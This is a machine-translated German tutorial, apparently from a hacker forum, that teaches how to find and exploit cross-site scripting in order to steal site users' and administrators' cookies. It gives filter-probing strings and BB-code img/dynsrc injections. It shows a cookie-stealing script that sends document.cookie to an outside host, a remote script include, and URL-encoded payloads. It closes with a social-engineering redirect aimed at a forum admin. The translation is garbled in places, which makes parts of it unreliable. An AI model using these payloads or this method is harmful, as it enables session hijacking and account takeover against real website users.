This page has been robot translated, sorry for typos if any. Original content here.

Beschreibung Xss von A bis Z.



  • Xss ist Css => Cross Site Scripting
  • Wie benutze ich XSS?
  • Was ist XSS-Angriff?
  • Was sind passive und aktive XSS?
  • Also, lassen Sie mich speziell, wie Sie in dieser Website XSS finden.
  • Und wie kann man feststellen, ob ein Filter vorhanden ist oder nicht?
  • Aktives XSS
  • Wir haben die ganze Zeit Typencodes gemacht.
  • Wie ersetze ich es mit dem Link mit Xss?


  • Xss ist Css => Cross Site Scripting

    Nicht zu verwechseln mit CSS, auch XSS genannt
    Zum ersten Mal erschien dieses BAG 1997.



    Wie benutze ich XSS?


    Zuerst müssen wir wissen, was ein Cookie ist.
    Wenn Sie wissen, können Sie es überspringen.

    Cookies werden zum Speichern von Anmeldeinformationen auf dem Computer eines Besuchers verwendet.
    Wenn Sie sich auf der Website unter dem Namen "blabluble" registriert haben, hat die Site eine Cookie-Datei auf Ihrem Computer gespeichert, auf der Ihre Daten verschlüsselt sind.
    Und wenn Sie einen Administrator haben und Sie Zugriff auf die Website haben und ich der Benutzer bin, der Cookies von Ihnen gestohlen hat (admin), kann ich sicher auf die Site zugreifen, und die Site definiert mich als 'admin' - ich werde Administratorrechte haben.

    Zum Ändern (Ersetzen von gestohlenen) Cookies rate ich Ihnen, das CookieEdit-Programm für IE oder die integrierten Funktionen in Opera und Firefox zu verwenden.

    Um Cookies abzufangen, müssen Sie einen Ort auf der Website finden, an dem Sie einen XSS-Angriff durchführen können.


    Was ist XSS-Angriff?


    XSS-Angriffe sind keine Angriffe auf die Website selbst, sondern auf die Benutzer der Website.
    XSS ist ein Fehler in der Filteranwendung.

    Es gibt passives XSS und aktives XSS.

    Was sind passive und aktive XSS?


    Passive sind Xss, die eine direkte Beteiligung des Opfers erfordern + es gibt spezifische Einschränkungen und Schwierigkeiten.
    Daher wird passives XSS nicht sehr geschätzt.
    Zum Beispiel müssen Sie sie zwingen, einem giftigen Link zu folgen, der Social Engineering, List erfordert.

    Aktiv - das sind XSS, die keine zusätzlichen Aktionen seitens des Opfers erfordern - sie muss nur die Seite mit Ihrem XSS öffnen und der Java-Code wird automatisch ausgeführt.
    Aufgrund ihrer Automatisierung sind sie sehr nützlich und wertvoll.
    Zum Beispiel gibt es in BB-Tags aktive hss, die aufgrund unzureichender Filterung existieren, wenn Sie eine Nachricht im Forum \ guestbook \ chat hinterlassen, die immer mit jedem Update aktiv ist.




    Also, lassen Sie mich speziell, wie Sie in dieser Website XSS finden.


    Wie ich früher schrieb, besteht XSS aus Tags, sie bestehen auch aus html und javascript language =).

    Javascript kann in HTML eingegeben werden.
    Sie können codieren, um Filter zu umgehen. Aber dazu später mehr.

    Wie kann man lernen, dass XSS auf dieser Seite besteht?
    Der uzdavimosti Typ ist schrecklich
    <script> alert () </ script> Wir versuchen, dieses Skript in alle verschiedenen Felder einzufügen ... wenn die Nachricht herauskam, wurde das Skript verarbeitet und ausgeführt.

    Das häufigste XSS (beobachtet an allen Orten, an denen die Filterung schlecht ist):

    "> <script> alert () </ script>

    Der springende Punkt ist "> .

    Lassen Sie uns darüber nachdenken, was wir tun, wenn wir das Feld "> <script> alert () </ script> eingeben, was passiert?

    Wir geben in der Form "> <script> alert () </ script> eine Variable ein Feldwert ein. Die Variable wird verarbeitet, "> ausgeführt, schließt

    Skript und führt <script> alert () </ script> aus

    Diese XSS ist die am häufigsten verwendete Suchmaschine:

    Wir durchsuchen alle Felder der Site und versuchen, "> <script> alert () </ script> einzufügen
    Wenn die Nachricht kam, haben Sie das XSS gefunden ...




    Und wie kann man feststellen, ob ein Filter vorhanden ist oder nicht?


    Geben Sie einfach ein beliebiges Feld ein: '';! - "<########> = & & ((})
    Als nächstes öffne die HTML-Seite und suche nach dem Wort "########"
    und sehen Sie den folgenden syvoy ..

    Wenn <> übrig bleibt, dann ist dies das erste Zeichen der Verwundbarkeit - dann hat der Filter ein Loch.
    Wenn "'\" Zeichen so blieben, wie sie eingegeben wurden, ist dies das zweite Zeichen der Verwundbarkeit - mögliche zusätzliche Zeichen für den nachfolgenden XSS-Angriff.
    Wenn Sie dann den HTML-Code öffnen, haben Sie <> dann wahrscheinlich kein Loch im Filter gefunden.
    Wenn Sie das HTML öffnen, finden Sie, dass <> durch andere Zeichen ersetzt, dann ist das ein Mist - ein Filter bei
    funktioniert am wenigsten normal.
    Es ist auch möglich, in das Feld einzugeben, um die Filterung wie folgt zu prüfen: "> <> '" `/ / \? @%

    Betrachten Sie den Fall, wenn der Filter <> verschlingt

    In diesem Fall besteht die Wahrscheinlichkeit eines Lochs.
    Zum Beispiel hat ein Filter eine Bedingung zu essen <script>, <> und.
    Dann probiere das <zxcvb script: alert ();

    Der Filter sieht nicht gefährlich aus in <IMG% 20SRC = "Java Script: alert (); nein, es schließt und damit
    Ausführen des Skripts

    Wenn der Filter verschiedene Codierungen nicht filtert, können Sie natürlich versuchen, das Skript zu codieren und den Code einzufügen.

    Alles sollte versucht werden durch Ausprobieren nach ...
    Versuche, in die Felder einzutreten und überprüfe sorgfältig, was wir vom Filter erhalten haben.
    Durch Tykov-Methode, verstehen, wie der Filter funktioniert, ob es Fehler hat.
    Wenn der Filter fehlerhaft ist, können wir immer Skripte einfügen.




    Aktives XSS


    Hier ist es notwendig, die erlaubten Tags zu verwenden und mit ihnen abgedeckt zu werden, Sie müssen die Abfrage ausführen.

    Zum Beispiel Tags url, bb, img.
    Der Hauptpunkt der Einfügung ist, dass wir eine Anfrage in den Parser img oder URL einbetten müssen. Img hat viele Parameter außer Src und Alt.
    Dieser Fehler wird sehr oft im Forum, in Gästebüchern verwendet ...

    Betrachte aktives XSS.

    Warnungen !!!

    Tags [fon * t], [im * g], [ur * l] schreiben mit *, damit sie nicht mit dem Site-Code verschmelzen.
    Um diese Tags zu verwenden, löschen Sie * .

    Lassen Sie uns zum Beispiel das Forum auf das Vorhandensein der Tags [fon * t], [im * g], [ur * l] überprüfen und versuchen, ein Skript in sie einzufügen oder sie zu kombinieren:

    [im * g] http: //www.qwewqw.ru/1.jpg [/ im * g] Ein Kreuz kommt heraus ... es bedeutet, dass img benutzt wird und wir es aufnahmen (es ist nur so, dass img eingeschaltet ist und Admins von Erstellen einer Nachricht, es ist entfernt, sie sagen, es ist unmöglich, Bilder einzufügen und es kann verwendet werden
    verschiedene Formen) wenn es kein Kreuz gibt ... und die ganze Inschrift hängt, dann versuche es nochmal so:
    [im * g src = https: //www.qwewqw.ru/1.jpg]

    Nun, zum Beispiel haben wir damit eine Kreuzung erreicht:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]

    Überprüfen Sie, ob der Filter ein Leerzeichen enthält, fügen Sie nach der Erweiterung jpg ein Leerzeichen hinzu:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]
    Wenn es ein Kreuz gibt, dann ist alles in Ordnung.

    Als nächstes hat img dynsrc und lowsrc Parameter, die JavaScript enthalten. Versuche beispielsweise folgendes einzufügen:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = Java-Skript: alert () [/ im * g]
    check, send - eine Nachricht erscheint - das bedeutet, Sie haben das aktive XSS gefunden und statt alert () können Sie ein beliebiges Skript einfügen.

    Wenn der Filter nicht aufgibt, versuchen Sie Folgendes:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" Java-Skript: alert () "/ 1.jpg [/ im * g]
    und
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = Java-Skript: alert () / 1.jpg [/ im * g]

    Wenn ein Kreuz aus den obigen Beispielen kam, wird https: //www.qweqw.ru/1.jpg durch die Adresse des Sniffers ersetzt.

    Es gibt Fälle, in denen jpg vom Administrator deaktiviert wird.




    Wir haben die ganze Zeit Typencodes gemacht:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Aber sie brachten keinen Vorteil, sie sind nur Codes zum Testen (Testen) auf Xss.

    Hier ist das Skript:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Er stiehlt bereits Kekse =)




    Wie ersetze ich es mit dem Link mit Xss?


    Ja, sehr einfach ...
    Es gibt mehrere Möglichkeiten:

    - 1) mach es so:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> wo die **** Seite mit Xss.

    Hier ist das Skript selbst:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Du kannst das immer noch tun:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> wo es sich auf http: // haknet bezieht .h16.ru / script / js.js

    und in js.js gibt es:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; Diese Methode ist zuverlässiger.

    Aber wie ich bereits geschrieben habe, gibt es manchmal Schwierigkeiten mit den Filtern auf der Seite (sie rollen unser Skript nicht).
    Dann müssen Sie darüber nachdenken, wie Sie es umgehen können.
    Sie können einfach etwas hinzufügen, etwas ändern oder es im Skript löschen.
    Aber es gibt eine zuverlässigere Option, wenn wir das Skript einfach kodieren. Dafür gibt es eine Menge Prog.
    Es gibt eine Seite wie http://ha.ckers.org/xss.html (Encoder-Decoder).

    Hier ist ein Beispiel:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    Es wurde codiert:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Besonders Verschlüsselung ist notwendig, um nicht nur Filter zu täuschen, sondern ADMIN zu täuschen, wenn PASSIVE CSU verwendet wird.

    Hier ist ein Beispiel, das auf Social Engineering basiert.
    Wir suchen einen Kontakt mit dem Administrator des Forums im Forum, um ihm einen Link zu Ihrer Seite zu schicken, und sagen so "cooles Feature ist auf der Seite" und bisher im selben Sinne.
    Und auf unserer Website haben Sie es erraten =) Hier ist das Skript:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Was fragen Sie bei document.location.href? )) .. das ist ein Java-Code, der ohne eine Anfrage an die angegebene Seite geht, also warum machen wir das, gaben uns einen Link zum Admin, und er ging auf unsere Seite, das wird gemacht .. er wird schnell umgeworfen

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E und das ist unser Xss in verschlüsselter Form.

    Hinweis: Dies funktioniert nur, wenn Xss zum Admin der Site gehört, zu der Sie den Link gelöscht haben ...
    Mit anderen Worten, die Aufgabe von PASSIVE CSU besteht darin, dass die Sicherheitslücke NUR genutzt werden kann, wenn das Opfer auf einer verletzlichen Seite AUTORISIERT ist !!!